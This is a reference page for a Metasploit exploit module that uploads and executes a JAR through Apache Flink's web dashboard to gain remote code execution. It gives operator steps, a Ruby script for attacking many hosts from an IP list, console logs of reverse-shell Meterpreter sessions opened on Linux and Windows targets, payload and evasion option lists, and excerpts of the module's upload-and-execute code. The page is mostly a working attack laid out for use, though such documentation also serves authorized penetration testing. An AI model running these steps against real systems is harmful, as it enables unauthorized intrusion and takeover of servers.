Apache Flink JAR Upload Java Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/apache_flink_jar_upload_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apache Flink JAR Upload Java Code Execution
Module: exploit/multi/http/apache_flink_jar_upload_exec
Source code: modules/exploits/multi/http/apache_flink_jar_upload_exec.rb
Disclosure date: 2019-11-13
Last modification time: 2022-05-11 12:47:44 +0000
Supported architecture(s): java
Supported platform(s): Java
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8081, 8443, 8880, 8888
List of CVEs: -

This module uses job functionality in Apache Flink dashboard web interface to upload and execute a JAR file, leading to remote execution of arbitrary Java code as the web server user. This module has been tested successfully on Apache Flink versions: 1.9.3 on Ubuntu 18.04.4; 1.11.2 on Ubuntu 18.04.4; 1.9.3 on Windows 10; and 1.11.2 on Windows 10.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using apache_flink_jar_upload_exec against a single host

Normally, you can use exploit/multi/http/apache_flink_jar_upload_exec this way:

msf > use exploit/multi/http/apache_flink_jar_upload_exec
msf exploit(apache_flink_jar_upload_exec) > show targets
    ... a list of targets ...
msf exploit(apache_flink_jar_upload_exec) > set TARGET target-id
msf exploit(apache_flink_jar_upload_exec) > show options
    ... show and set options ...
msf exploit(apache_flink_jar_upload_exec) > exploit

Using apache_flink_jar_upload_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your apache_flink_jar_upload_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/apache_flink_jar_upload_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module uses job functionality in Apache Flink dashboard web interface to upload and execute a JAR file, leading to remote execution of arbitrary Java code as the web server user.

This module has been tested successfully on Apache Flink versions:

  • 1.9.3 on Ubuntu 18.04.4;
  • 1.11.2 on Ubuntu 18.04.4;
  • 1.9.3 on Windows 10; and
  • 1.11.2 on Windows 10.

Verification Steps


wget 'https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz'
tar zxvf flink-1.11.2-bin-scala_2.11.tgz
cd flink-1.11.2/
./bin/start-cluster.sh

Metasploit:

  1. ./msfconsole
  2. use exploit/multi/http/apache_flink_jar_upload_exec
  3. set rhosts <rhost>
  4. run

Scenarios


msf6 > use exploit/multi/http/apache_flink_jar_upload_exec 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > set rhosts 172.16.191.194
rhosts => 172.16.191.194
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > check
[*] 172.16.191.194:8081 - The target appears to be vulnerable. Apache Flink version 1.9.3.
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Apache Flink version 1.9.3.
[*] Uploading JAR payload 'bxAGPHOcppvL.jar' (5309 bytes) ...
[*] Retrieving list of avialable JAR files ...
[+] Found uploaded JAR file 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar'
[*] Executing JAR payload 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' entry class 'metasploit.Payload' ...
[*] Sending stage (58147 bytes) to 172.16.191.194
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.194:38326) at 2021-02-18 07:19:58 -0500
[*] Removing JAR file 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' ...

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer    : linux-18-04-04-amd64
OS          : Linux 5.3.0-40-generic (amd64)
Meterpreter : java/linux
meterpreter > 
msf6 > use exploit/multi/http/apache_flink_jar_upload_exec 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > set rhosts 172.16.191.193
rhosts => 172.16.191.193
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > check
[*] 172.16.191.193:8081 - The target appears to be vulnerable. Apache Flink version 1.11.2.
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Apache Flink version 1.11.2.
[*] Uploading JAR payload 'JhnJgOxev.jar' (5309 bytes) ...
[*] Retrieving list of avialable JAR files ...
[+] Found uploaded JAR file '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar'
[*] Executing JAR payload '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' entry class 'metasploit.Payload' ...
[*] Sending stage (58147 bytes) to 172.16.191.193
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.193:51105) at 2021-02-18 07:18:02 -0500
[*] Removing JAR file '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' ...
[!] Cleanup failed. Could not remove JAR file '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar'

meterpreter > getuid
Server username: User
meterpreter > sysinfo
Computer    : WinDev1710Eval
OS          : Windows 10 10.0 (amd64)
Meterpreter : java/windows
meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the multi/http/apache_flink_jar_upload_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/apache_flink_jar_upload_exec

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show info

       Name: Apache Flink JAR Upload Java Code Execution
     Module: exploit/multi/http/apache_flink_jar_upload_exec
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-11-13

Provided by:
  Henry Chen
  bigger.wing
  bcoles <[email protected]>

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    8081             yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module uses job functionality in Apache Flink dashboard web 
  interface to upload and execute a JAR file, leading to remote 
  execution of arbitrary Java code as the web server user. This module 
  has been tested successfully on Apache Flink versions: 1.9.3 on 
  Ubuntu 18.04.4; 1.11.2 on Ubuntu 18.04.4; 1.9.3 on Windows 10; and 
  1.11.2 on Windows 10.

References:
  https://www.exploit-db.com/exploits/48978
  https://packetstormsecurity.com/files/159779
  https://github.com/biggerwing/apache-flink-unauthorized-upload-rce-
  https://s.tencent.com/research/bsafe/841.html
  https://cloud.tencent.com/developer/article/1540439
  https://nsfocusglobal.com/advisory-apache-flink-remote-code-execution-vulnerability/

Module Options


This is a complete list of options available in the multi/http/apache_flink_jar_upload_exec exploit:

msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show options

Module options (exploit/multi/http/apache_flink_jar_upload_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8081             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/http/apache_flink_jar_upload_exec exploit:

msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show advanced

Module advanced options (exploit/multi/http/apache_flink_jar_upload_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/apache_flink_jar_upload_exec module can exploit:

msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/apache_flink_jar_upload_exec exploit:

msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/apache_flink_jar_upload_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/apache_flink_jar_upload_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No reply.


Here is a relevant code snippet related to the "No reply." error message:

65:	      'method' => 'GET',
66:	      'uri' => normalize_uri(target_uri.path, 'config')
67:	    })
68:	
69:	    unless res
70:	      return CheckCode::Unknown('No reply.')
71:	    end
72:	
73:	    unless res.body.include?('flink')
74:	      return CheckCode::Safe('Target is not Apache Flink.')
75:	    end

Here is a relevant code snippet related to the "Target is not Apache Flink." error message:

69:	    unless res
70:	      return CheckCode::Unknown('No reply.')
71:	    end
72:	
73:	    unless res.body.include?('flink')
74:	      return CheckCode::Safe('Target is not Apache Flink.')
75:	    end
76:	
77:	    version = res.get_json_document['flink-version']
78:	    if version
79:	      return CheckCode::Appears("Apache Flink version #{version}.")

Here is a relevant code snippet related to the "Apache Flink version <VERSION>." error message:

74:	      return CheckCode::Safe('Target is not Apache Flink.')
75:	    end
76:	
77:	    version = res.get_json_document['flink-version']
78:	    if version
79:	      return CheckCode::Appears("Apache Flink version #{version}.")
80:	    end
81:	
82:	    CheckCode::Appears
83:	  end
84:	

Cleanup failed. Could not remove JAR file '<JAR>'


Here is a relevant code snippet related to the "Cleanup failed. Could not remove JAR file '<JAR>'" error message:

132:	    print_status("Removing JAR file '#{@jar}' ...")
133:	
134:	    res = delete_jar(@jar)
135:	
136:	    unless res && res.code == 200
137:	      print_warning("Cleanup failed. Could not remove JAR file '#{@jar}'")
138:	    end
139:	  end
140:	
141:	  def exploit
142:	    data = generate_payload.encoded_jar.pack

Failed to generate the JAR payload.


Here is a relevant code snippet related to the "Failed to generate the JAR payload." error message:

138:	    end
139:	  end
140:	
141:	  def exploit
142:	    data = generate_payload.encoded_jar.pack
143:	    fail_with(Failure::Unknown, 'Failed to generate the JAR payload.') unless data
144:	
145:	    filename = "#{rand_text_alpha(8..12)}.jar"
146:	
147:	    print_status("Uploading JAR payload '#{filename}' (#{data.length} bytes) ...")
148:	

JAR upload failed. No reply.


Here is a relevant code snippet related to the "JAR upload failed. No reply." error message:

147:	    print_status("Uploading JAR payload '#{filename}' (#{data.length} bytes) ...")
148:	
149:	    res = upload_jar(filename, data)
150:	
151:	    unless res
152:	      fail_with(Failure::Unreachable, 'JAR upload failed. No reply.')
153:	    end
154:	
155:	    unless res.code == 200
156:	      fail_with(Failure::UnexpectedReply, "JAR upload failed. Unexpected reply (HTTP #{res.code}).")
157:	    end

JAR upload failed. Unexpected reply (HTTP <RES.CODE>).


Here is a relevant code snippet related to the "JAR upload failed. Unexpected reply (HTTP <RES.CODE>)." error message:

151:	    unless res
152:	      fail_with(Failure::Unreachable, 'JAR upload failed. No reply.')
153:	    end
154:	
155:	    unless res.code == 200
156:	      fail_with(Failure::UnexpectedReply, "JAR upload failed. Unexpected reply (HTTP #{res.code}).")
157:	    end
158:	
159:	    unless res.get_json_document['status'] == 'success'
160:	      fail_with(Failure::UnexpectedReply, 'JAR upload failed. Unexpected reply.')
161:	    end

JAR upload failed. Unexpected reply.


Here is a relevant code snippet related to the "JAR upload failed. Unexpected reply." error message:

155:	    unless res.code == 200
156:	      fail_with(Failure::UnexpectedReply, "JAR upload failed. Unexpected reply (HTTP #{res.code}).")
157:	    end
158:	
159:	    unless res.get_json_document['status'] == 'success'
160:	      fail_with(Failure::UnexpectedReply, 'JAR upload failed. Unexpected reply.')
161:	    end
162:	
163:	    print_status('Retrieving list of avialable JAR files ...')
164:	
165:	    res = list_jars

Could not list available JARs. No reply.


Here is a relevant code snippet related to the "Could not list available JARs. No reply." error message:

163:	    print_status('Retrieving list of avialable JAR files ...')
164:	
165:	    res = list_jars
166:	
167:	    unless res
168:	      fail_with(Failure::Unreachable, 'Could not list available JARs. No reply.')
169:	    end
170:	
171:	    unless res.code == 200
172:	      fail_with(Failure::UnexpectedReply, "Could not list available JARs. Unexpected reply (HTTP #{res.code}).")
173:	    end

Could not list available JARs. Unexpected reply (HTTP <RES.CODE>).


Here is a relevant code snippet related to the "Could not list available JARs. Unexpected reply (HTTP <RES.CODE>)." error message:

167:	    unless res
168:	      fail_with(Failure::Unreachable, 'Could not list available JARs. No reply.')
169:	    end
170:	
171:	    unless res.code == 200
172:	      fail_with(Failure::UnexpectedReply, "Could not list available JARs. Unexpected reply (HTTP #{res.code}).")
173:	    end
174:	
175:	    jars = res.get_json_document['files']
176:	
177:	    if jars.blank?

Could not list available JARs. No JAR files available.


Here is a relevant code snippet related to the "Could not list available JARs. No JAR files available." error message:

173:	    end
174:	
175:	    jars = res.get_json_document['files']
176:	
177:	    if jars.blank?
178:	      fail_with(Failure::UnexpectedReply, 'Could not list available JARs. No JAR files available.')
179:	    end
180:	
181:	    jars.each do |jar|
182:	      if jar['name'] == filename
183:	        @jar = jar['id']

Could not retrieve JAR file name.


Here is a relevant code snippet related to the "Could not retrieve JAR file name." error message:

184:	        break
185:	      end
186:	    end
187:	
188:	    unless @jar
189:	      fail_with(Failure::UnexpectedReply, 'Could not retrieve JAR file name.')
190:	    end
191:	
192:	    print_good("Found uploaded JAR file '#{@jar}'")
193:	
194:	    entry_class = 'metasploit.Payload'

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Henry Chen
  • bigger.wing
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.